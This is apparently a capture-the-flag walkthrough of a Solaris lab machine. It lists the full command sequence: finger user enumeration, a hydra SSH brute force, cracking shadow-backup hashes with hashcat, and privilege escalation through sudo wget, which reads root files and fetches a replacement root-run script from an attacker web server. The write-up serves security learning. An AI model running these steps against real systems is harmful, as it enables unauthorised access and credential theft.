When i connect to a machine i usally use nmap to scan but for just learning new tools i will use rustscan to scan all ports then use nmap to scan the version and use scripts
Finger is an older protocol which displays information about users on a machine. This can be abused to verify if a user is valid on that machine. The protocol itself was designed in the 1970s, and is run in cleartext. (ref) (ref2)
So now we need to gather information about users on the machine, to do this we can use metasploit (auxiliary/scanner/finger/finger_users) but i will use finger-user-enum by pentestmonkey
$wgethttps://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz$tar-xzffinger-user-enum-1.0.tar.gz&&cdfinger-user-enum-1.0# we need list of users to brute force# i will use this https://github.com/danielmiessler/SecLists/blob/master/Usernames/Names/names.txt$./finger-user-enum.pl-U/usr/share/wordlists/seclists/Usernames/Names/names.txt-t10.10.10.76access@10.10.10.76:accessNoAccessUser<....>..nobody4SunOS4.xNFSAnonym<....>..admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..dladm Datalink Admin < . . . . >..netadm Network Admin < . . . . >..netcfg Network Configuratio < . . . . >..dhcpserv DHCP Configuration A < . . . . >..ikeuser IKE Admin < . . . . >..lp Line Printer Admin < . . . . >..
annemarie@10.10.10.76:LoginNameTTYIdleWhenWhere..anne???..marie???..bin@10.10.10.76:bin???<....>..deedee@10.10.10.76:LoginNameTTYIdleWhenWhere..dee???..dee???..ike@10.10.10.76:ikeuserIKEAdmin<....>..joann@10.10.10.76:LoginNameTTYIdleWhenWhere..ann???..jo???..laverne@10.10.10.76:LoginNameTTYIdleWhenWhere..la???..verne???..line@10.10.10.76:LoginNameTTYIdleWhenWhere..lpLinePrinterAdmin<....>..message@10.10.10.76:LoginNameTTYIdleWhenWhere..smmspSendMailMessageSub<....>..miofmela@10.10.10.76:LoginNameTTYIdleWhenWhere..mela???..miof???..root@10.10.10.76:rootSuper-Userssh<Dec7,2023>10.10.14.46..sammy@10.10.10.76:sammy???ssh<Apr13,2022>10.10.14.13..sunny@10.10.10.76:sunny???ssh<Apr13,2022>10.10.14.13..sys@10.10.10.76:sys???<....>..zsazsa@10.10.10.76:LoginNameTTYIdleWhenWhere..zsa???..zsa???..
SSH 22022/tcp
we get 3 users logged in with ssh : root,sammy and sunny so now we will try to brute force ssh
we couldn't brute force root and sammy but we got sunny:sunday
$hydra-s22022-t64-lsunny-P/usr/share/wordlists/seclists/Passwords/probable-v2-top1575.txt10.10.10.76sshHydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-14 10:24:32[DATA] max 64 tasks per 1 server, overall 64 tasks, 1575 login tries (l:1/p:1575), ~25 tries per task[DATA] attacking ssh://10.10.10.76:22022/[STATUS] 434.00 tries/min, 434 tries in 00:01h, 1168 to do in 00:03h, 37 active[22022][ssh] host: 10.10.10.76 login: sunny password: sunday1of1targetsuccessfullycompleted,1validpasswordfound
now we logged in as sunny and we don't see user.txt as the user flag that means there are other users we need to search for
# ssh sunny@sunday.htb -p 22022$cat/etc/passwd|grepbashroot:x:0:0:Super-User:/root:/usr/bin/bashopenldap:x:75:75:OpenLDAPUser:/:/usr/bin/pfbashsammy:x:100:10::/home/sammy:/usr/bin/bashsunny:x:101:10::/home/sunny:/usr/bin/bash# so we need to get sammy's password
Let's keep searching the machine for any odd files we get .bash_history and there are commands run
su-sudo-lsudo/root/trollls/backupls-l/backupcat/backup/shadow.backup# lets see what sudo -l gives sunnyUsersunnymayrunthefollowingcommandsonsunday: (root) NOPASSWD:/root/troll$sudo/root/trolltestinguid=0(root) gid=0(root)# we see it is printing testing and then id as root# we can't edit it or even see what is this even after research what is this# so we will keep continue to look at backup/backup$ls-la-rw-r--r--1rootroot319Dec192021agent22.backup-rw-r--r--1rootroot319Dec192021shadow.backup#agent22.backupmysql:NP:::::::openldap:*LK*:::::::webservd:*LK*:::::::postgres:NP:::::::svctag:*LK*:6445::::::nobody:*LK*:6445::::::noaccess:*LK*:6445::::::nobody4:*LK*:6445::::::sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::#shadow.backupmysql:NP:::::::openldap:*LK*:::::::webservd:*LK*:::::::postgres:NP:::::::svctag:*LK*:6445::::::nobody:*LK*:6445::::::noaccess:*LK*:6445::::::nobody4:*LK*:6445::::::sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::# they are identical
we have that hash and to know which encryption algorithm is used we have to look at $id
$1$ is MD5 | $2a$ is Blowfish | $2y$ is Blowfish | $5$ is SHA-256 | $6$ is SHA-512 | $y$ is yescrypt
now we know it is SHA-256 , we will use hashcat
to get the mode of hashcat we look at their website , but when we search for SHA-256 we don't get a hash like what we have so we search with $5$ we get " sha256crypt $5$, SHA256 (Unix) 2 " and mode 7400
For a faster result use it on your baremetal os , since i have windows i used on windows and it didn't take a second to crack [ Hashcat | rockyou.txt ]
# we login ssh sammy@sunday.htb -p 22022$id uid=100(sammy) gid=10(staff)$wcuser.txt1133user.txt
For privilege escalation we can see many ways to it and i will try to write about all
#1 Sudo all
$sudo-lUsersammymayrunthefollowingcommandsonsunday: (ALL) ALL (root) NOPASSWD:/usr/bin/wget# if we can run all that means we can get root bash$sudo/bin/bashroot@sunday:/home/sammy#wc/root/root.txt1133/root/root.txt
#2 wget
when we see binaries that we can run as root we look at GTFOBins and see what can we do with it
# For fast win we can read /root/root.txt (flag)$sudowget-i/root/root.txt--2024-10-1415:51:22--http://456efbda87744c9fe91f7358645a8c08/# and the flag between / /# we can read /etc/shadow file then crack root password$sudowget-i/etc/shadow--2024-10-1415:41:18--ftp://root/$5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553=> ‘Mo1Iq6XYfJlFXs58aA4Sr3:18969::::::23997553’# $5$rounds=10000$fIoXFZ5A$k7PlwsiH0wAyVOcKaAYl/Mo1Iq6XYfJlFXs58aA4Sr3 is the hash of root######### we can download files with wget # so what if we can do that to /root/troll to edit it and get a shell to sunny# and i think that was the goal for the box# make a file named "troll" then python file transfer server # python3 -m http.server 8000# we need to setup our terminals like this and do sammy's command then fast sundaysammy$sudowget-ihttp://10.10.16.8:8000/troll-O/root/trollsunny$sudo/root/troll# and we would get a root shell on sunny's terminal
we can read 4 files
root.txt : flag
troll : the file that sunny can run as root
troll.original : a backup file of troll
overwrite : a script that runs every 5 seconds and changes troll file back to troll.original